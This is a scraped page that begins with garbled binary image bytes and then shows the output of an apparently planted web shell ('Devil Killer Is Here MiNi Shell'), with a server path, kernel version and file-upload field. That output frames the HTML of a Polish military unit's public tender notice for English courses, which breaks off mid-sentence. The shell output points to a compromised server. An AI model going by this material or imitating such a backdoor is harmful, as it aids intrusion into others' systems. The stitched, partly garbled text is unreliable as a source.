JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220810/0030066101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie kursów semestralnych języka angielskiego w LJO CSMW w Ustce w II semestrze 2022 roku na poziomach: podstawowym (I) oraz średniozaawansowanym (II) – ETAP II. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">6 Wojskowy Oddział Gospodarczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 220515410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1N</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lędowo-Osiedle</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-271</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">6wog.przetargi@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.6wog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Wojskowa Jednostka Budżetowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie kursów semestralnych języka angielskiego w LJO CSMW w Ustce w II semestrze 2022 roku na poziomach: podstawowym (I) oraz średniozaawansowanym (II) – ETAP II. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c043d547-1804-11ed-b950-8227d40187e8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00300661</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-08-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00053918/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Usługa przeprowadzenia kursów j. angielsiego (CSMW, 1 bz Lębork) - 2 etap2022r.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/6wog/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez System.<br/>System jest dostępny pod adresem: https://portal.smartpzp.pl/6wog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług Systemu (regulamin Portalu e-Usług) i dostępnym z poziomu modułu e-learning dla wszystkich użytkowników Systemu oraz podczas rejestracji konta Wykonawcy dla Wykonawców.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1. administratorem Pani/Pana danych osobowych jest: <br/>Komendant 6 Wojskowego Oddziału Gospodarczego, Lędowo – Osiedle 1N, 76 – 271 Ustka, nr fax: 261 231 578;<br/>2. inspektorem ochrony danych osobowych w 6 WOG Ustka jest Pani Dagmara Stecka -Giedrojć, tel. 261 231 377;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego Nr 46/SZKOL/6WOG/2022 prowadzonym w trybie podstawowym bez negocjacji w zw. z art. 359 pkt. 2 ustawy PZP;<br/>4. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021.1129 t.j. z późn. zm.) oraz art. 2 ust. 1 ustawy z dnia 06.09.2001 r. o dostępie do informacji publicznej, tj. Dz. U. z 2020 r. poz. 2176, z 2021 r. poz. 1598, 1641;<br/>5. Pani/Pana dane osobowe będą przechowywane, zgodnie z jednolitym rzeczowym wykazem akt, przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8. posiada Pani/Pan:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmiana postanowień umowy w zakresie niezgodnym z ustawą Pzp. oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa <br/>w art. 18 ust. 2 RODO przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony prawnej osoby fizycznej lub prawnej, luz z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">46/SZKOL/6WOG/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przeprowadzenie kursów semestralnych języka angielskiego w Lektoracie Języków Obcych Centrum Szkolenia Marynarki Wojennej w Ustce w II semestrze 2022 roku na poziomach: podstawowym (I) oraz średniozaawansowanym (II) – ETAP II.<br/><br/><br/>1. Miejsce przeprowadzenia kursu: Lektorat Języków Obcych CSMW <br/>w Ustce, ul. Lędowo 1N, 76-271 USTKA. Dopuszcza się prowadzenie szkolenia online <br/>z wykorzystaniem metod i technik nauczania na odległość. <br/>2. Szkolenie realizowane będzie zgodnie z Natowskim Porozumieniem Standaryzacyjnym STANAG 6001, Ramowym i szczegółowym programem nauczania języka angielskiego <br/>w jednostkach wojskowych podległych Dowódcy Generalnemu RSZ - Poziom podstawowy (SPJ 1111 wg STANAG 6001) - Warszawa 2016 (sygn. Dow. Gen. wewn. 45/2016) oraz Ramowym i szczegółowym programem nauczania języka angielskiego <br/>w jednostkach wojskowych podległych Dowódcy Generalnemu RSZ - Poziom średniozaawansowany (SPJ 2222 wg STANAG 6001) - Warszawa 2016 (sygn. Dow. Gen. wewn. 63/2016).<br/>3. Liczba grup szkoleniowych:<br/> - na poziomie podstawowym – 5 grup szkoleniowych,<br/> - na poziomie średniozaawansowanym	– 1 grupa szkoleniowa,<br/>	łącznie 6 grup szkoleniowych<br/>4. Liczba uczestników w jednej grupie - maksymalnie 10 osób.<br/>5. Czas trwania i liczba godzin kursu:<br/>a. na poziomie I - po 576 godzin lekcyjnych w każdej grupie szkoleniowej;<br/>b. na poziomie II - 576 godzin lekcyjnych w grupie szkoleniowej;<br/>ogółem – 3 456 godzin lekcyjnych we wszystkich grupach szkoleniowych. <br/>6. Każda godzina lekcyjna trwać będzie 45 min. Dopuszcza się - na uzasadniony wniosek metodyka kursów - prowadzenie zajęć w tzw. blokach lekcyjnych po 45, 60, 70 i 90 min., które w skali dnia odpowiadają 6 godzinom lekcyjnym. Szczegółowy rozkład zajęć określa Porządek dnia Lektoratu Języków Obcych CSMW. <br/>7. Zajęcia będą prowadzone w dni powszednie (od poniedziałku do piątku) w godzinach <br/>od 8.00 – 15.00, w wymiarze 6 godzin lekcyjnych dziennie. W wyjątkowych sytuacjach dopuszcza się możliwość realizacji zajęć w soboty w tym samym wymiarze czasowym. Decyzje w tym zakresie podejmuje Komendant Centrum Szkolenia Marynarki Wojennej.<br/>8. Zajęcia w każdej grupie szkoleniowej muszą być prowadzone codziennie przez dwóch lektorów, w tym przez jednego lektora wiodącego i jednego lektora pomocniczego, <br/>po 3 godziny lekcyjne każdy. W wyjątkowych i uzasadnionych przypadkach dopuszcza się inną organizację zajęć za zgodą Kierownika LJO CSMW. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-05 do 2023-01-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca wraz z ofertą przesyła formularz cenowy, w którym należy podać cenę jednostkową pozycji oraz wartość brutto. Informacje wykazane w formularzu cenowym są niezbędne w celu ustalenia wartości całkowitej usługi. Niewypełnienie formularza zgodnie z jego treścią będzie skutkowało odrzuceniem oferty. Wartości z formularza cenowego należy wstawić w odpowiednie miejsca w formularzu ofertowym. <br/>2. Wykonawca winien zaoferować cenę jednoznaczną i ostateczną, która nie będzie podlegała negocjacjom.<br/>3. Cena oferty i składające się na nią ceny jednostkowe winny być określone w walucie polskiej z dokładnością do dwóch miejsc po przecinku, ponieważ w takiej walucie będą dokonywane rozliczenia między Zamawiającym a Wykonawcą, którego oferta zostanie uznana za najkorzystniejszą. <br/>4. Jeżeli złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2018 r. poz. 2174, z późn. zm.), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć. W ofercie, o której mowa, wykonawca ma obowiązek: <br/>1) poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego; <br/>2) wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego; <br/>3)	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku;<br/>4) wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje i doświadczenie lektorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w niniejszej specyfikacji oraz spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej: <br/>Warunek zostanie spełniony, gdy Wykonawca:<br/>1) dysponuje odpowiednim potencjałem technicznym w postaci sprzętu i materiałów dla potrzeb kursu w ilościach wskazanych w opisie przedmiotu zamówienia, stanowiącym załącznik nr 1 do SWZ i złoży oświadczenie na załączniku nr 5a do SWZ.<br/>2) dysponuje osobami zdolnymi do wykonania zamówienia i złoży oświadczenie na załączniku nr 5 do SWZ.<br/><br/>Wykonawca skieruje po dwóch lektorów języka angielskiego dla każdej grupy szkoleniowej, tj. lektora wiodącego i lektora pomocniczego oraz metodyka kursów, spełniających następujące wymagania w zakresie wykształcenia i doświadczenia:<br/><br/>2.1.) Lektor wiodący - wymagane wyższe wykształcenie pedagogiczne: <br/>- dyplom licencjata filologii angielskiej lub <br/>- dyplom licencjata filologii dwóch języków, z wiodącą filologią angielską, lub<br/>- dyplom magistra filologii angielskiej, lub <br/>- dyplom magistra filologii dwóch języków, z wiodącą filologią angielską;<br/>- kwalifikacje pedagogiczne, tzn. wykształcenie - jak wyżej - ze specjalnością nauczycielską lub ukończonym kursem pedagogicznym;<br/>- minimum roczne doświadczenie w pracy świadczonej w latach 2019 – 2022 na stanowisku lektora/nauczyciela/nauczyciela akademickiego j. angielskiego;<br/>- doświadczenie w prowadzeniu kursów – zgodnych z Porozumieniem STANAG 6001 - dla jednostek organizacyjnych resortu obrony narodowej w ilości minimum dwóch kursów semestralnych (5 miesięcznych) przeprowadzonych w latach 2019 – 2022, podczas których osobiście przeprowadził min. 260 godz. lekcyjnych w każdym semestrze; dla nauczyciela akademickiego wymóg ten wynosi 130 godzin;<br/>- znajomość wymogów Porozumienia Standaryzacyjnego NATO – STANAG 6001;<br/>- znajomość ramowego i szczegółowego programu kursu, do którego prowadzenia jest zgłoszony.<br/><br/>2.2.) Lektor pomocniczy - wymagane wykształcenie wyższe: <br/>- dyplom licencjata filologii angielskiej, lub <br/>- dyplom licencjata filologii dwóch języków z wiodącą filologią angielską, lub<br/>- dyplom magistra filologii angielskiej, lub<br/>- dyplom magistra filologii dwóch języków z wiodącą filologią angielską;<br/>- kwalifikacje pedagogiczne, tzn. wykształcenie, jak wyżej, ze specjalnością nauczycielską lub ukończony kurs pedagogiczny;<br/>- minimum roczne doświadczenie w pracy na stanowisku: <br/>lektora/nauczyciela/nauczyciela akademickiego j. angielskiego, świadczonej w latach 2019 - 2022, albo<br/>- osobiste przeprowadzenie minimum 240 godzin lekcyjnych <br/>w jednym semestrze na kursach zgodnych z Porozumieniem STANAG 6001, w jednostkach organizacyjnych resortu obrony narodowej, w latach 2016 – 2021. Dla nauczyciela akademickiego wymóg ten nie obowiązuje;<br/>- znajomość wymogów Porozumienia Standaryzacyjnego NATO – STANAG 6001;<br/>- znajomość ramowego i szczegółowego programu kursu, do którego prowadzenia jest zgłoszony.<br/><br/>2.3.) Metodyk kursów - wymagane wykształcenie wyższe:<br/>- magister filologii angielskiej w specjalności metodyka nauczania języka angielskiego, lub<br/>- magister filologii angielskiej oraz minimum dwuletnie, doświadczenie <br/>w pracy w charakterze metodyka nauczania języka angielskiego, lub<br/>- magister filologii angielskiej oraz minimum dwuletnie doświadczenie <br/>w charakterze nauczyciela akademickiego, lub <br/>- magister filologii angielskiej i stopień nauczyciela mianowanego języka angielskiego;<br/>- znajomość wymogów Porozumienia Standaryzacyjnego NATO – STANAG 6001;<br/>- znajomość ramowego i szczegółowego programu kursu, do którego prowadzenia jest zgłoszony. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/><br/>1. W zakresie spełniania warunków udziału w postępowaniu zgodnie z wymogami określonymi w Rozdziale VII:<br/><br/>a) w celu poświadczenia wykształcenia, posiadanych kwalifikacji dla lektorów i metodyków - oryginał dyplomu lub jego kopia,<br/>b) w celu potwierdzenia doświadczenia zawodowego – świadectwa pracy lub zaświadczenia dokumentujące posiadanie co najmniej rocznego (dla lektora wiodącego i pomocniczego) doświadczenia w pracy świadczonej w latach 2019 – 2022 na stanowisku lektora/nauczyciela języka angielskiego (wydane przez podmioty, na rzecz których świadczona była praca);<br/>c) dokumenty poświadczające kwalifikacje pedagogiczne (wydane przez uczelnię lub ośrodek uprawniony do prowadzenia kursów pedagogicznych);<br/>d) doświadczenie w prowadzeniu kursów według Porozumienia STANAG 6001 potwierdza się wyłącznie zaświadczeniem (kopią) wydanym przez jednostkę wojskową, na rzecz której świadczona była usługa kształcenia językowego. Musi ono zawierać imię i nazwisko lektora, poziom i termin realizacji kursu, ilość godzin lekcyjnych przeprowadzonych osobiście w czasie trwania kursu oraz zdawalność kursu/grupy prowadzonej przez lektora. Zaświadczenia, o których mowa powyżej, wydaje dowódca jednostki wojskowej na wniosek lektora uczestniczącego w realizacji zadań wynikających z umowy. Ewentualne kopie powyższych dokumentów muszą być potwierdzone <br/>„za zgodność z oryginałem” na każdej stronie i podpisane przez osobę uprawnioną, tj. składającą podpis na ofercie.<br/>e) oświadczenie na załączniku nr 5a do SWZ, że dysponuje odpowiednim potencjałem technicznym w postaci sprzętu i materiałów dla potrzeb kursu.<br/>f) oświadczenie na załączniku nr 5 do SWZ, że dysponuje osobami zdolnymi do wykonania zamówienia.<br/><br/>2. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych <br/>w postępowaniu lub są one niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia <br/>w wyznaczonym terminie, chyba, że oferta Wykonawcy podlega odrzuceniu bez względu na ich złożenie, poprawienie lub uzupełnienie, lub zachodzą przesłanki unieważnienia postępowania. <br/>3.	Wykonawca składa podmiotowe środki dowodowe na wezwanie, aktualne na dzień ich złożenia.<br/>4.	W przypadku 